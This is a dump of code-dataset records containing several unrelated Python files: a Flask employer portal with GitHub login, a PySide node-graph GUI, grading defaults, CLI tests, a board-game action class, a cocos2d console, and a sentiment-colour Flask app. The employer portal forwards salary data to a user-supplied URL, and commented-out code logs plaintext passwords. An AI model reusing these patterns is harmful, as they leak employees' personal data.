github.get('/user')\n\tprint(account_info)\n\tgit_username = ''\n\tprint(git_username)\n\tprint('Checking uname')\n\tif account_info.ok and flag==False:\n\t\tprint('Checking uname started')\n\t\taccount_info_json = account_info.json()\n\t\tgit_username = account_info_json['login']\n\t\tprint(git_username)\n\t\tsession['user'] = git_username\n\t\tprint(\"Reach\")\n\t\treturn redirect(url_for('addEmployer', username=session['user']))\n\treturn render_template('employer_home.html')\n\n@app.before_request\ndef before_request():\n\tg.user =None\n\tif 'user' in session:\n\t\tg.user = session['user']\n\n\n# @app.route('/github')\n# def github_login():\t\n# \taccount_info = github.get('/user')\n# \tprint('4')\n# \tif account_info.ok:\n# \t\taccount_info_json = account_info.json()\n\n# \t\treturn '<h1> Your GitHub name is @{}'.format(account_info_json['login'])\n\n\n@app.route('/github_login', methods=['GET', 'POST'])\ndef github_login():\n\n\t\n\n\tsession.pop('user', None)\n\t# print('1')\n\t# if not twitter.authorized:\n\t# \tprint('2')\n\t# \treturn redirect(url_for('twitter.login'))\n\t# print('3')\n\t# account_info = twitter.get('account/settings')\n\t# print('4')\n\t# if account_info.ok:\n\t# \taccount_info_json = account_info.json()\n\n\t# \treturn '<h1> Your Twitter name is @{}'.format(account_info_json['screen_name'])\n\n\t# Correct code\n\t# if not github.authorized:\n\t# \treturn redirect(url_for('github.login'))\n\t# account_info = github.get('/user')\n\t# git_username = ''\n\t# if account_info.ok:\n\t# \taccount_info_json = 
account_info.json()\n\t# \tgit_username = account_info_json['login']\n\n\n\n\tf = open(\"log1.txt\", \"a+\")\n\tf.write(\"method: GET \\nEnd-point: http://127.0.0.1:8001/login \\nparameters: None\\n\" )\n\tf.close()\n\t# Employee_details1 = Employee_details.query.filter_by(username=username),first()\n\t\n\t\n\n\tif request.method == 'POST':\n\t\tf = open(\"log1.txt\", \"a+\")\n\t\tf.write(\"method: POST \\nEnd-point: http://127.0.0.1:8001/login \\nparameters: Login from git \")\n\t\tf.close()\n\n\t\t### CODE FOR OAUTH\n\t\tprint(\"Reach0\")\n\t\tif not github.authorized:\n\t\t\tprint(\"NA\")\n\t\t\treturn redirect(url_for('github.login'))\n\t\tprint(\"A\")\n\t\taccount_info = github.get('/user')\n\t\tprint(account_info)\n\t\tgit_username = ''\n\t\tprint(git_username)\n\t\tprint('Checking uname')\n\t\tif account_info.ok:\n\t\t\tprint('Checking uname started')\n\t\t\taccount_info_json = account_info.json()\n\t\t\tgit_username = account_info_json['login']\n\t\t\tprint(git_username)\n\t\t\tsession['user'] = git_username\n\t\t\tprint(\"Reach\")\n\t\t\treturn redirect(url_for('addEmployer', username=session['user']))\n\n\t\t## MAINSTREAM LOGIN\n\t\t# for i in range(1):\n\t\t# \tf.write(\"POST, http://127.0.0.1:8001/login, username: \"+request.form['username']+\", password: \"+request.form['password']+\" %d\\r\\n\" % (i))\n\t\t# emppass = request.form\n\t\t# username = request.form['username']\n\t\t# get_emp = Employee_details.query.filter_by(username=username).first()\n\t\t# password = request.form['password']\n\n\n\t\t# pathToXML = \"Salt.xml\"\n\t\t# tree = ET.parse(pathToXML)\n\t\t# root = tree.getroot()\n\n\t\t# # all items data\n\t\t# print('Expertise Data:'+str(root)+str(tree))\n\t\t# salt = ''\n\t\t# for elem in root:\n\t\t# \tsalt = elem.text\n\n\n\t\t# if get_emp is None:\n\t\t# \terror = 'User not present! Try again.'\n\t\t# \treturn render_template('login.html', error = error)\n\t\t# if get_emp.password != password+salt:\n\t\t# \terror = 'Password do not match! Try again.'\n\t\t# \treturn render_template('login.html', error = error)\n\t\t# else:\n\t\t# session['user'] = username\n\t\t# return redirect(url_for('addEmployer', username=session['user']))\n\t\t\n\t\t\n\t# return '<h1>Request failed! 
<h1>'\n\t# return render_template('login.html')\n\treturn render_template('github_login.html')\n\n\n@app.route('/employer_form/<string:username>', methods=['POST','GET'])\ndef addEmployer(username):\n\tf = open(\"log1.txt\", \"a+\")\n\tf.write(\"method: GET \\nEnd-point: http://127.0.0.1:8001//employer_form/<string:username> \\nparameters: None\\n\" )\n\tf.close()\n\n\n\tif request.method == 'POST':\n\t\tprint(g.user)\n\t\t# f = open(\"log1.txt\", \"a+\")\n\t\t# f.write(\"method: POST \\nEnd-point: http://127.0.0.1:8001//employer_form/<string:username> \\nparameters: username: \"+request.form['username']+\", application_no: \"+request.form['application_no']+\", mbr_web_service: \"+request.form['mbr_web_service']+\" \")\n\t\t# f.close()\n\n\t\temployee = Employee_details()\n\t\temployerDetails = request.form\n\t\tusername = employerDetails[\"username\"]\n\t\tapplication_number = employerDetails[\"application_no\"]\n\t\tmbr_web_service_address = employerDetails[\"mbr_web_service\"]\n\n\t\tget_employee = Employee_details.query.filter_by(username=g.user).first()\n\t\turl = str(mbr_web_service_address)+'?salary='+str(get_employee.salary)+'&application_number='+str(application_number)+'&emp_name='+str(get_employee.emp_name)+'&emp_start_date='+str(get_employee.emp_start_date)\n\t\tprint(url)\n\t\ttry:\n\n\t\t\tr = requests.get(str(mbr_web_service_address)+'?salary='+str(get_employee.salary)+'&application_number='+str(application_number)+'&emp_name='+str(get_employee.emp_name)+'&emp_start_date='+str(get_employee.emp_start_date))\n\t\texcept:\n\t\t\tmessage = 'Invalid endpoint. try again'\n\t\t\treturn render_template('employer_updatestatus.html', message=message)\n\n\t\tif r.text == 'success':\n\n\t\t\tmessage = 'Employee details submitted sucessfully to MBR portal.'\n\t\t\treturn render_template('employer_updatestatus.html', message=message)\n\t\telse:\n\n\t \t\treturn \"<h1> Error occured while submitting details to MBR portal. </h1>\"\n\t \t\tdb.session.close_all()\n\t \t\tdb.session.add(employee)\n\t \t\tdb.session.commit()\n\n\t \t\treturn\"<h1> Employee details submitted sucessfully. 
</h1>\"\n\telse:\n\t\tif g.user:\n\t\t\treturn render_template('employer_form.html', username=username)\n\n\n\treturn redirect(url_for('github.login'))\n\n@app.route('/logout', methods=['GET'])\ndef logout():\n\tf = open(\"log1.txt\", \"w+\")\n\tf.write(\"method: GET \\nEnd-point: http://127.0.0.1:8001/logout \\nparameters: logged out\\n\" )\n\tf.close()\n\tsession.pop('user', None)\n\t# session.pop('user', None)\n\tflag = True\n\treturn redirect(url_for('github_login'))\n\n# if __name__ == '__main__':\n# \tapp.secret_key = 'abcdweb'\n# \tapp.run(debug=True, port=8001)","sub_path":"CloudFlask/employer_portal.py","file_name":"employer_portal.py","file_ext":"py","file_size_in_byte":7656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"487313332","text":"\n# PySide imports\nfrom PySide import QtGui, QtCore\n\n\n__all__ = ['GraphicsNode', 'Connection']\n\n\nclass GraphicsNode(QtGui.QGraphicsItem):\n \"\"\"\n Basic graphics item to be added to GraphicsWidgets.\n \"\"\"\n\n Rectangle, Radial = range(0, 2)\n\n def __init__(self,\n name,\n width=150,\n height=30,\n inputs=None,\n outputs=None,\n position=None,\n defaultOutput=True,\n color=None,\n nodeType=Rectangle):\n \"\"\"\n :return:\n \"\"\"\n super(GraphicsNode, self).__init__()\n\n self._name = name\n self._width = width\n self._height = height\n self.connections = []\n self._DoubleClickFunction = None\n self._data = {}\n self._color = color\n self._showData = 0\n self._nodeType = nodeType\n\n self._activeTerminal = None\n self._terminalPoints = {}\n\n self._inputs = {}\n self._outputs = {}\n\n if inputs:\n for input in inputs:\n self._inputs[input] = []\n\n if defaultOutput:\n self._outputs['output'] = []\n\n if outputs:\n for output in outputs:\n self._outputs[output] = []\n\n self._height = height * max(len(self._outputs.keys()), len(self._inputs.keys())) + height\n\n if self._nodeType == self.Radial:\n self._width = self._height\n\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable)\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable)\n\n if position is not None:\n self.setPos(position[0], position[1])\n\n self.update()\n\n def position(self):\n return self.pos().x(), self.pos().y()\n\n def inputs(self):\n return self._inputs\n\n def outputs(self):\n return self._outputs\n\n def name(self):\n return self._name\n\n def setDoubleClickFunction(self, function):\n self._DoubleClickFunction = function\n\n def dataKeys(self):\n return self._data.keys()\n\n def setData(self, key, data):\n self._data[key] = data\n\n def rawData(self):\n return self._data\n\n def data(self, key):\n data = self._data[key]\n return data\n\n def hold(self):\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, False)\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable, False)\n\n def release(self):\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable)\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable)\n\n def terminal(self, point):\n \"\"\"\n Pick terminal\n \"\"\"\n for terminal in self._terminalPoints:\n if self._terminalPoints[terminal].contains(self.mapFromScene(point).x(), self.mapFromScene(point).y()):\n return terminal\n\n def mousePressEvent(self, event):\n \"\"\"\n Mouse press event override for highlighting.\n \"\"\"\n for terminal in self._terminalPoints.keys():\n self._showData = 0\n if terminal == 'data':\n if self._terminalPoints[terminal].contains(event.pos().x(), event.pos().y()):\n self._showData = 1\n return\n continue\n rect = self._terminalPoints[terminal]\n if rect.contains(event.pos().x(), 
event.pos().y()):\n self._activeTerminal = terminal\n self.update()\n self.hold()\n self.scene().enterConnectionMode(self.mapToScene(self.mapFromItem(self, rect.center())))\n return\n\n self._activeTerminal = None\n QtGui.QGraphicsItem.mousePressEvent(self, event)\n\n def mouseReleaseEvent(self, event):\n \"\"\"\n Mouse press event override for highlighting.\n \"\"\"\n self._activeTerminal = None\n QtGui.QGraphicsItem.mouseReleaseEvent(self, event)\n\n self.release()\n self.update()\n\n def mouseDoubleClickEvent(self, event):\n terminal = self.terminal(self.mapToScene(event.pos()))\n if terminal:\n if terminal == 'data':\n pass\n else:\n for connection in self.connections:\n if connection.connected[self] == terminal:\n connection.disconnect()\n self.scene()._deleted.append(connection)\n return\n\n if self._DoubleClickFunction:\n self._DoubleClickFunction(self)\n\n def connect(self, thisTerminal, node, thatTerminal):\n return Connection(self, node, thisTerminal, thatTerminal)\n\n def boundingRect(self):\n return QtCore.QRectF(0, 0, self._width, self._height + (20 * len(self._data)) + 5)\n\n def paint(self, painter, option, widget):\n if self._nodeType == self.Rectangle:\n gradient = QtGui.QLinearGradient(0, 0, 0, self._height)\n if self._color:\n gradient.setColorAt(0, QtGui.QColor(self._color[0], self._color[1], self._color[2], 200))\n gradient.setColorAt(25 / self._height, QtGui.QColor(self._color[0], self._color[1], self._color[2], 200))\n gradient.setColorAt(1, QtGui.QColor(self._color[0]/2, self._color[1]/2, self._color[2]/2, 200))\n else:\n gradient.setColorAt(0, QtGui.QColor(70, 70, 90, 200))\n gradient.setColorAt(25 / self._height, QtGui.QColor(70, 70, 90, 200))\n gradient.setColorAt(1, QtGui.QColor(30, 30, 30, 200))\n\n gradient.setColorAt(20 / self._height, QtGui.QColor(50, 50, 50, 200))\n shadowOffset = 2.5\n painter.setBrush(QtGui.QColor(10, 10, 10, 30))\n painter.setPen(QtGui.QColor(10, 10, 10, 30))\n painter.drawRoundedRect(10 + shadowOffset, 0 + shadowOffset, self._width - 20 + shadowOffset, self._height - 10 + shadowOffset, 7.5, 7.5)\n\n if self.isSelected():\n painter.setPen(QtGui.QColor(100, 100, 170))\n else:\n painter.setPen(QtGui.QColor(70, 70, 90))\n\n painter.setBrush(QtGui.QBrush(gradient))\n painter.drawRoundedRect(10, 0, self._width - 20, self._height - 10, 7.5, 7.5)\n\n headerGrade = QtGui.QLinearGradient(0, 2.5, 0, 20)\n headerGrade.setColorAt(0, QtGui.QColor(70, 70, 70))\n headerGrade.setColorAt(.1, QtGui.QColor(100, 100, 100))\n headerGrade.setColorAt(1, QtGui.QColor(80, 80, 80))\n painter.setBrush(QtGui.QBrush(headerGrade))\n\n painter.drawRoundedRect(QtCore.QRect(0, 2.5, self._width, 20), 7.5, 7.5)\n painter.setPen(QtCore.Qt.white)\n painter.drawText(QtCore.QRect(0, 5, self._width, 15), QtCore.Qt.AlignCenter, self._name)\n painter.setPen(QtGui.QColor(70, 70, 90))\n\n headerGrade = QtGui.QLinearGradient(0, 0, 10, 0)\n headerGrade.setColorAt(0, QtGui.QColor(70, 90, 70))\n headerGrade.setColorAt(.1, QtGui.QColor(70, 120, 70))\n headerGrade.setColorAt(1, QtGui.QColor(70, 90, 70))\n painter.setBrush(QtGui.QBrush(headerGrade))\n\n offset = (len(self._inputs) / self._height) + 30\n size = 10\n highlighter = QtGui.QColor(100, 100, 120)\n\n for input in sorted(self._inputs.keys()):\n if not self._activeTerminal is None and input == self._activeTerminal:\n painter.setPen(highlighter)\n else:\n painter.setPen(QtGui.QColor(70, 70, 90))\n\n terminal = QtCore.QRect(0, offset, size, size)\n painter.drawEllipse(terminal)\n self._terminalPoints[input] = terminal\n 
painter.setPen(QtCore.Qt.white)\n painter.drawText(QtCore.QRect(size + 5, offset - 3, self._width - (size*2), (size*2)), QtCore.Qt.AlignLeft, input)\n offset += 30\n\n headerGrade = QtGui.QLinearGradient(self._width, 0, self._width - 10, 0)\n headerGrade.setColorAt(0, QtGui.QColor(90, 70, 70))\n headerGrade.setColorAt(.1, QtGui.QColor(150, 70, 70))\n headerGrade.setColorAt(1, QtGui.QColor(90, 70, 70))\n painter.setBrush(QtGui.QBrush(headerGrade))\n\n offset = (len(self._outputs) / self._height) + 30\n\n for output in sorted(self._outputs.keys()):\n if not self._activeTerminal is None and output == self._activeTerminal:\n painter.setPen(highlighter)\n else:\n painter.setPen(QtGui.QColor(70, 70, 90))\n terminal = QtCore.QRect(self._width - size, offset, size, size)\n painter.drawEllipse(terminal)\n self._terminalPoints[output] = terminal\n painter.setPen(QtCore.Qt.white)\n painter.drawText(QtCore.QRect(size - 5, offset - 3, self._width - (size*2), size*2), QtCore.Qt.AlignRight, output)\n offset += 30\n\n if self._data != {}:\n self._terminalPoints['data'] = QtCore.QRect((self._width / 2) - 5, self._height - 10, 10, 10)\n\n if self._showData != 0:\n self._showData = (20 * len(self._data))\n\n offset = self._height + 5\n\n pen = painter.pen()\n pen.setStyle(QtCore.Qt.DotLine)\n painter.setPen(pen)\n\n painter.drawLine(self._terminalPoints['data'].center(),\n QtCore.QPoint(self._terminalPoints['data'].center().x(), self._height + self._showData))\n\n pen = painter.pen()\n pen.setStyle(QtCore.Qt.SolidLine)\n pen.setBrush(QtGui.QColor(200, 200, 200))\n painter.setPen(pen)\n\n for key in sorted(self._data):\n painter.drawText(QtCore.QRect(0, offset - 3, self._width/2 - 3, self._width), QtCore.Qt.AlignRight, str(key))\n painter.drawText(QtCore.QRect(self._width/2 + 3, offset - 3, self._width/2, self._width), QtCore.Qt.AlignLeft,\n str(self._data[key]))\n\n offset += 20\n\n headerGrade = QtGui.QLinearGradient(0, self._terminalPoints['data'].y(), 0, self._terminalPoints['data'].y() + self._terminalPoints['data'].height())\n headerGrade.setColorAt(0, QtGui.QColor(70, 70, 120))\n headerGrade.setColorAt(.1, QtGui.QColor(100, 100, 150))\n headerGrade.setColorAt(1, QtGui.QColor(70, 70, 100))\n painter.setBrush(QtGui.QBrush(headerGrade))\n painter.setPen(QtGui.QColor(70, 70, 90))\n painter.drawEllipse(self._terminalPoints['data'])\n\n for connection in self.connections:\n connection.getTerminalScenePositions()\n\n\nclass CommentNode(QtGui.QGraphicsTextItem):\n def mouseDoubleClickEvent(self, event):\n import HFX\n\n comment = HFX.Dialog('Comment')\n input = HFX.MultiLineEdit()\n input.setText(self.toPlainText())\n comment.addWidget(input)\n\n if not comment.show():\n return\n\n self.setPlainText(input.toPlainText())\n\n def paint(self, painter, option, widget):\n\n origPen = painter.pen()\n origBrush = painter.brush()\n\n gradient = QtGui.QLinearGradient(0, 0, self.boundingRect().width(), 0)\n gradient.setColorAt(0, QtGui.QColor(50, 125, 50))\n gradient.setColorAt(1, QtGui.QColor(50, 125, 50, 0))\n painter.setBrush(gradient)\n painter.setPen(QtGui.QColor(70, 70, 90))\n painter.drawRoundedRect(self.boundingRect(), 7.5, 7.5)\n\n painter.setBrush(origBrush)\n painter.setPen(origPen)\n\n self.setDefaultTextColor(QtCore.Qt.white)\n\n QtGui.QGraphicsTextItem.paint(self, painter, option, widget)\n\n\nclass Connection(QtGui.QGraphicsLineItem):\n \"\"\"\n Connection item.\n \"\"\"\n def __init__(self, nodeA, nodeB, terminalA, terminalB):\n super(Connection, self).__init__()\n\n # Store nodes\n self.nodeA = nodeA\n 
self.nodeB = nodeB\n\n self.terminalAid = terminalA\n self.terminalBid = terminalB\n\n self.connected = {\n nodeA: terminalA,\n nodeB: terminalB\n }\n\n self.setZValue(-1)\n\n self.nodeA.connections.append(self)\n self.nodeB.connections.append(self)\n\n if terminalA not in self.nodeA._inputs:\n self.nodeA._outputs[terminalA].append(self.nodeB)\n else:\n self.nodeA._inputs[terminalA].append(self.nodeB)\n\n if terminalB not in self.nodeB._inputs:\n self.nodeB._outputs[terminalB].append(self.nodeA)\n else:\n self.nodeB._inputs[terminalB].append(self.nodeA)\n\n def _rangeLuma(self, value):\n return min(255, max(80, value))\n\n def paint(self, painter, option, widget):\n pen = QtGui.QPen()\n colA = [70, 70, 90]\n colB = [70, 70, 90]\n if self.nodeA._color:\n colA = self.nodeA._color\n if self.nodeB._color:\n colB = self.nodeB._color\n\n grad = QtGui.QLinearGradient(self.line().p1(), self.line().p2())\n grad.setColorAt(0, QtGui.QColor(\n self._rangeLuma(int((colA[0] + colB[0])/2) * 2),\n self._rangeLuma(int((colA[1] + colB[1])/2) * 2),\n self._rangeLuma(int((colA[2] + colB[2])/2) * 2)\n ))\n\n grad.setColorAt(.5, QtGui.QColor(\n self._rangeLuma(int((colA[0] + colB[0])/2)),\n self._rangeLuma(int((colA[1] + colB[1])/2)),\n self._rangeLuma(int((colA[2] + colB[2])/2))\n ))\n\n grad.setColorAt(1, QtGui.QColor(\n self._rangeLuma(int((colA[0] + colB[0])/2) * 2),\n self._rangeLuma(int((colA[1] + colB[1])/2) * 2),\n self._rangeLuma(int((colA[2] + colB[2])/2) * 2)\n ))\n\n pen.setBrush(grad)\n pen.setCapStyle(QtCore.Qt.RoundCap)\n pen.setJoinStyle(QtCore.Qt.RoundJoin)\n\n self.setPen(pen)\n\n QtGui.QGraphicsLineItem.paint(self, painter, option, widget)\n\n def disconnect(self):\n self.nodeA.connections.pop(self.nodeA.connections.index(self))\n self.nodeB.connections.pop(self.nodeB.connections.index(self))\n\n try:\n self.scene().removeItem(self)\n except AttributeError:\n return\n\n def getTerminalScenePositions(self):\n # Store terminal id information.\n try:\n self.terminalA = self.mapFromItem(self.nodeA, self.nodeA._terminalPoints[self.terminalAid].center())\n self.terminalB = self.mapFromItem(self.nodeB, self.nodeB._terminalPoints[self.terminalBid].center())\n self.setLine(self.terminalA.x(), self.terminalA.y(), self.terminalB.x(), self.terminalB.y())\n except KeyError:\n pass\n","sub_path":"HFX/hfx_gui/Graphics.py","file_name":"Graphics.py","file_ext":"py","file_size_in_byte":14892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"91537262","text":"\"\"\"Default values for a bunch of stuffs.\n\"\"\"\n\nGRADING_KEYS = [\n dict(key='A', verbose='Excellent', start=70, end=100),\n dict(key='B', verbose='Very Good', start=60, end=69),\n dict(key='C', verbose='Good', start=50, end=59),\n dict(key='D', verbose='Fair', start=40, end=49),\n dict(key='E', verbose='Weak', start=30, end=39),\n dict(key='F', verbose='Fail', start=00, end=29)\n]\n\nRATING_SCALE = [\n dict(key=5, verbose='Excellent'),\n dict(key=4, verbose='Very Good'),\n dict(key=3, verbose='Good'),\n dict(key=2, verbose='Fair'),\n dict(key=1, verbose='Fail'),\n]\n\nGRADING_SCHEME = dict(\n num_tests=2, percentager_per_test=30, percentage_exam=70, total=100)\n\nSECURITY_QUESTIONS = [\n dict(key=1, verbose='How old are you?'),\n dict(key=2, verbose='What is your favorite food?'),\n dict(key=3, verbose='What is the name of your pet?'),\n dict(key=4, verbose='What is your favorite song?'),\n]\n\nSCHOOL_LEVELS = [\n dict(key=1, verbose='Montessouri'),\n dict(key=2, verbose='Kindergarten'),\n 
dict(key=3, verbose='Nursery'),\n dict(key=4, verbose='Primary'),\n dict(key=5, verbose='Secondary'),\n]\n","sub_path":"silos/utils/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"311605485","text":"# Copyright 2017 BBVA\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport click\n\nfrom click.testing import CliRunner\n\nfrom apitest.actions.unittest.cli import generate\n\nimport apitest.actions.unittest.analyze.console\n\n\ndef _launch_apitest_generate_unittest_in_console(blah, **kwargs):\n click.echo(\"ok\")\n\n\ndef test_cli_analyze_runs_show_help():\n runner = CliRunner()\n result = runner.invoke(generate)\n\n assert 'Missing argument \"file_path\"' in result.output\n\n\ndef test_sendto_cli_analyze_runs_missing_options():\n # Patch the launch of: launch_apitest_generate_load_in_console\n apitest.actions.unittest.cli.launch_apitest_generate_unittest_in_console = _launch_apitest_generate_unittest_in_console\n\n runner = CliRunner()\n result = runner.invoke(generate, [\"sssss\"])\n\n assert 'Error: Missing option \"-o\" / \"--output-dir\"' in result.output\n\n\ndef test_sendto_cli_analyze_runs_ok_with_options():\n # Patch the launch of: launch_apitest_generate_load_in_console\n apitest.actions.unittest.cli.launch_apitest_generate_unittest_in_console = _launch_apitest_generate_unittest_in_console\n\n runner = CliRunner()\n result = runner.invoke(generate, [\"-o\", \"xxxx\", \"sssss\"])\n\n assert result.output == \"ok\\n\"\n","sub_path":"refactor/old/tests/unittesting/actions/sendto/cli/test_cli_generate.py","file_name":"test_cli_generate.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"64559285","text":"import copy\nclass Action:\n def __init__(self, type, n, a, b, colour):\n self.type = type\n self.n = n\n self.a = a\n self.b = b\n self.colour = colour\n if colour == \"white\":\n self.enemy = \"black\"\n elif colour == \"black\":\n self.enemy = \"white\"\n\n def apply_to(self, state):\n #return a state\n def boom(current_state, coord, boomed, colour, enemy):\n new_state = {}\n new_state[colour] = [x for x in current_state[colour] if x[1:3] != coord]\n new_state[enemy] = [y for y in current_state[enemy] if y[1:3] != coord]\n boomed.append(coord)\n xmin = coord[0]-1\n if xmin < 0:\n xmin = 0\n xmax = coord[0]+2\n if xmax > 8:\n xmax = 8\n ymin = coord[1]-1\n if ymin < 0:\n ymin = 0\n ymax = coord[1]+2\n if ymax > 8:\n ymax = 8\n if len(new_state[colour]) == 0 and len(new_state[enemy]) == 0:\n return new_state\n for x in range(xmin, xmax):\n for y in range(ymin, ymax):\n if [x,y] not in boomed:\n for member in new_state[colour]+new_state[enemy]:\n if member[1:3] == [x,y]:\n new_state = boom(new_state, [x,y], boomed, colour, enemy)\n break;\n\n return new_state\n def move(current_state, number, coord, f_coord, colour):\n #print(\"\\nMOVING \", colour, \" 
FROM \", coord, \" TO \", f_coord)\n new_state = copy.deepcopy(current_state)\n #print(\"CHANGING INTERNAL STATE\")\n #print(\"FROM\", new_state)\n #if moving onto another white then form a stack\n white_list=[(white[1], white[2]) for white in current_state[colour]]\n #print(\"WHITE LIST:\", white_list)\n #print(\"COORD :\", coord)\n #print(\"F_COORD:\", f_coord)\n if f_coord in white_list:\n #print(\"moving onto another white\")\n for white_member in new_state[colour]:\n if tuple(white_member[1:3]) == coord:\n #if moving all of the stack at once then remove current stack\n if white_member[0] == number:\n new_state[colour].remove(white_member)\n break\n #if moving part of the stack then remove a number from the stack\n if white_member[0] > number:\n white_member[0] -= number\n\n #then add the removed items onto existing stack at the destination\n for white_member in new_state[colour]:\n if tuple(white_member[1:3]) == f_coord:\n white_member[0] += number\n return new_state\n else:\n #print(\"not moving onto another white\")\n #if not moving onto any other white\n for white_member in new_state[colour]:\n if tuple(white_member[1:3]) == coord:\n #if moving all of the stack at once then just change the coord\n if number == white_member[0]:\n white_member[1] = f_coord[0]\n white_member[2] = f_coord[1]\n #if moving a part of the stack then add another stack to the destination\n if number < white_member[0]:\n white_member[0] -= number\n new_state[colour] += [[number] + list(f_coord)]\n #print(\"TO \", new_state)\n return new_state\n return new_state\n\n if self.type == \"BOOM\":\n return boom(state, self.a, [], self.colour, self.enemy)\n elif self.type == \"MOVE\":\n return move(state, self.n, self.a, self.b, self.colour)\n return state\n def return_stack(self):\n if self.type == \"BOOM\":\n return 0\n elif self.type == \"MOVE\":\n return self.n\n def return_action(self):\n if self.type == \"BOOM\":\n return (self.type, self.a)\n elif self.type == \"MOVE\":\n return (self.type, self.n, self.a, self.b)\n return None\n\n def is_valid(self, state):\n for i in self.b:\n if i<0 or i>7:\n return False\n #check if not going to black\n enemy_positions = [tuple(mem[1:3]) for mem in (state[self.enemy])]\n if self.b in enemy_positions:\n return False\n return True\n\n @classmethod\n def rewind_move(cls, action):\n return cls(action.type, action.n, action.b, action.a, action.colour)\n\n @classmethod\n def move_from_attributes(cls, n, coord, step, direction, colour):\n return cls(\"MOVE\", n, coord, (coord[0]+step*direction[0], coord[1]+step*direction[1]), colour)\n\n @classmethod\n def from_tuple(cls, tup, colour):\n if len(tup) == 2:\n return cls(tup[0], None, tup[1], None, colour)\n elif len(tup) == 4:\n return cls(tup[0], tup[1], tup[2], tup[3], colour)\n","sub_path":"enhance/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":5286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"601435012","text":"\n__all__ = ['Console']\n\nfrom cocos.director import director\nfrom cocos.layer.interpreter import InterpreterLayer\n\n\nclass Console(InterpreterLayer):\n def init_config(self):\n super(Console, self).init_config()\n x,y = director.get_window_size()\n self.cfg['background.height'] = y / 3\n self.cfg['background.y'] = y / 3 * 2\n\n #################\n # Layer Events\n #################\n def on_enter(self):\n super(Console, self).on_enter()\n vw, vh = director.get_window_size()\n self.on_resize(vw, vh / 3)\n\n def on_resize(self, width, 
height):\n vw, vh = director.get_window_size()\n self.layout.begin_update()\n self.layout.height = vh / 3\n self.layout.x = 2\n self.layout.width = vw - 4\n self.layout.y = vh\n self.layout.end_update()\n\n # XXX: hack\n x,y = director.window.width, director.window.height\n self.layout.top_group._scissor_width = x - 4\n\n self.caret.position = len(self.document.text)\n","sub_path":"gamelib/tiless_editor/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"558148812","text":"from flask import Blueprint, request, render_template, flash, g, session, redirect, url_for, \\\n abort, jsonify, Flask\nfrom app.core.repository import *\nfrom flask import Flask, render_template, jsonify, request, make_response\nfrom textblob import TextBlob\nfrom numpy import mean # or write your own mean function\nfrom collections import defaultdict\nimport os, logging, json, requests, urllib2\n\nmod = Blueprint('core', __name__)\n\n@mod.route('/colorsPOST', methods=['POST'])\ndef colors():\n\tif request.method == 'POST':\n\t\tvals = getColors()\n\t\tuser = json.dumps(vals)\n\t\tresp = make_response(user)\n\t\tresp.headers[\"Content-Type\"] = \"application/json\"\n\telse:\n\t\tabort(500)\n\treturn resp\n\n@mod.route('/colors')\ndef printCols():\n\tvals = getColors()\n\treturn jsonify(gradients=vals)\n\n\n@mod.route('/')\ndef index():\n repository = Repository()\n vals = getColors()\n user = json.dumps(vals)\n return render_template('core/index.html', resources=repository.getResources(),user=user)\n\ndef getColors():\n\turl = \"http://www.pornmd.com/getliveterms\"\n\tjson = requests.get(url).json()\n\tjson_size = len(json)\n\tnewjson = dict()\n\tfor i, age in enumerate(d['segment'] for d in json): \n\t if age == 's':\n\t \tage = 255,10,10\n\t if age == 'g':\n\t \tage = 255,255,10\n\t if age == 't':\n\t \tage = 126,255,255\n\t newjson[i] = age \n\t # print i,age\n\tnewerjson = dict()\n\tfor i, msg in enumerate(d['keyword'] for d in json):\n\t\twiki = TextBlob(msg)\n\t\tnewerjson[i] = wiki.sentiment.polarity\n\t\tpolls = wiki.sentiment.polarity\n\t\tfeels = wiki.sentiment.subjectivity\n\t\tif polls != 0.0:\n\t\t\tOldRange = (1.0 - (-1.0) ) \n\t\t\tNewRange = (255 - 1) \n\t\t\tNewValue = (((polls - (-1.0)) * NewRange) / OldRange) + 1\n\t\t\tpolls = NewValue\n\t\tif feels != 0.0:\n\t\t\tOldRange = (1.0 - 0 )\n\t\t\tNewRange = (255 - 1) \n\t\t\tNewValue = (((feels - (-0)) * NewRange) / OldRange) + 1\n\t\t\tfeels = NewValue\n\t\tnewerjson[i] = (int(polls), int(feels), int((polls+feels)/2))\n\t\t# print i,msg,feels,polls\n\t# newestjson = dict()\n\tfor key in newjson:\n\t\tif newerjson[key] != (0,0,0):\n\t\t\tx = (newerjson[key], newjson[key])\n\t\t\ty = tuple(map(mean, zip(*x)))\n\t\t\tnewerjson[key] = y\n\tnewest = {k:v for k,v in newerjson.iteritems() if not v == (0,0,0)}\n\tFinalVals= newest.values()\n\tlister = zip(*[iter(FinalVals)] * 2)\n\tfinalDict = dict()\n\tcount = 0\n\tfor x, val in enumerate(FinalVals):\n\t\tif x == 0:\n\t\t\tfinalDict[count] = {}\n\t\t\tfinalDict[count]['start'] = val\n\t\tif x == 1:\n\t\t\tfinalDict[count]['stop'] = val\n\t\t\tcount += 1\n\t\tif x % 2 == 0:\n\t\t\tfinalDict[count] = 